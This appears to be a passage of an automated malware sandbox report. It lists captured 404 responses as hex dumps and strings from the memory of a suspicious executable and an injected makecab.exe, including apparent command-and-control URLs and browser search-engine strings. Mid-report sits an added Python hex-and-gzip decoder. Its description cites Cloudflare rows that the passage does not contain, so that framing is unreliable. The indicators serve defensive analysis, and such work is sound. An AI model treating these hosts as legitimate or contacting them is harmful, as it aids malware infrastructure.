            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Jul 2024 05:24:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Jul 2024 05:24:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Jul 2024 05:24:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Jul 2024 05:25:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
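The "Data Raw" fields above hold only the first few hundred bytes of each response as hex, and the two Cloudflare 404s are chunked and gzip-compressed, so their "Data Ascii" rendering is unreadable. The Python below is an added example, not part of the Joe Sandbox report, that turns such a hex dump back into text: it strips the report's prefix, reassembles the chunked body, and inflates the gzip stream. The headers, HTML and one-chunk layout of the sample are constructed here to mirror the Cloudflare response; a dump cut off mid-chunk, as sandbox captures usually are, yields the decodable prefix together with a completeness flag instead of an exception.

```python
import gzip
import re
import zlib
from typing import Tuple


def parse_hex_dump(dump: str) -> bytes:
    """Turn a report 'Data Raw: 3c 21 44 ...' field back into bytes.

    Text after 'Data Ascii:' is the report's own rendering and is ignored.
    """
    hex_part = dump.split("Data Raw:", 1)[-1].split("Data Ascii:", 1)[0]
    return bytes(int(tok, 16) for tok in re.findall(r"\b[0-9a-fA-F]{2}\b", hex_part))


def dechunk(body: bytes) -> Tuple[bytes, bool]:
    """Reassemble an HTTP/1.1 chunked body.

    Returns (data, complete). Sandbox dumps are cut off after a few hundred bytes,
    so a chunk shorter than its declared size yields what is present with
    complete=False instead of raising.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), False          # size line itself is cut off
        size_field = body[pos:eol].split(b";")[0].strip()   # drop chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            return bytes(out), False
        if size == 0:
            return bytes(out), True           # terminating zero-length chunk
        start = eol + 2
        chunk = body[start:start + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False
        pos = start + size + 2                # skip the CRLF after the chunk data


def gunzip_partial(data: bytes) -> bytes:
    """Inflate a gzip stream that may be truncated; returns the decodable prefix."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+ selects gzip framing
    try:
        return inflater.decompress(data)
    except zlib.error:
        return b""                            # cut inside the gzip header or corrupt


def decode_report_body(hex_dump: str, headers: str) -> Tuple[str, bool]:
    """Undo chunking and gzip as announced by the captured response headers."""
    raw = parse_hex_dump(hex_dump)
    complete = True
    if "Transfer-Encoding: chunked" in headers:
        raw, complete = dechunk(raw)
    if "Content-Encoding: gzip" in headers:
        raw = gunzip_partial(raw)
    return raw.decode("utf-8", errors="replace"), complete


# Constructed sample shaped like the Cloudflare 404 above: one gzip chunk plus terminator.
SAMPLE_HEADERS = ("HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8"
                  "Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip")
SAMPLE_HTML = (b"<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>"
               + b"<!-- a padding to disable MSIE and Chrome friendly error page -->" * 6
               + b"</body></html>")


def make_sample(html: bytes, truncate_at=None) -> str:
    """Build a 'Data Raw' field for html, optionally cut off like a sandbox dump."""
    gz = gzip.compress(html, mtime=0)
    body = b"%x\r\n%s\r\n0\r\n\r\n" % (len(gz), gz)
    if truncate_at is not None:
        body = body[:truncate_at]
    return "Data Raw: " + " ".join(f"{b:02x}" for b in body)
```

To apply it to a real row, paste the row's "Data Raw" text and its header text into decode_report_body; the Apache and nginx rows above carry neither chunking nor gzip, so for them the function reduces to the hex decode.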
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4102732817.0000000004C9F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3333711m14.shop
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4102732817.0000000004C9F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3333711m14.shop/fl6s/
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/comments/feed/
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/feed/
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/sample-page/
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_sl
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-includes/blocks/navigation/style.min.css?ver=6.5.2
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-includes/blocks/navigation/view.min.js?ver=6.5.2
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-includes/js/dist/interactivity.min.js?ver=6.5.2
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js?ver=1.8.2
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/wp-json/
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onlandtoy.com/xmlrpc.php?rsd
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005D44000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003894000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://301mei.xyz:7788/?u=
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cn.wordpress.org
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://itsjojosiwas.com/wp-content/uploads/2024/06/pngtree-ship-logo-cruise-or-ship-logo-boat-logo-
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
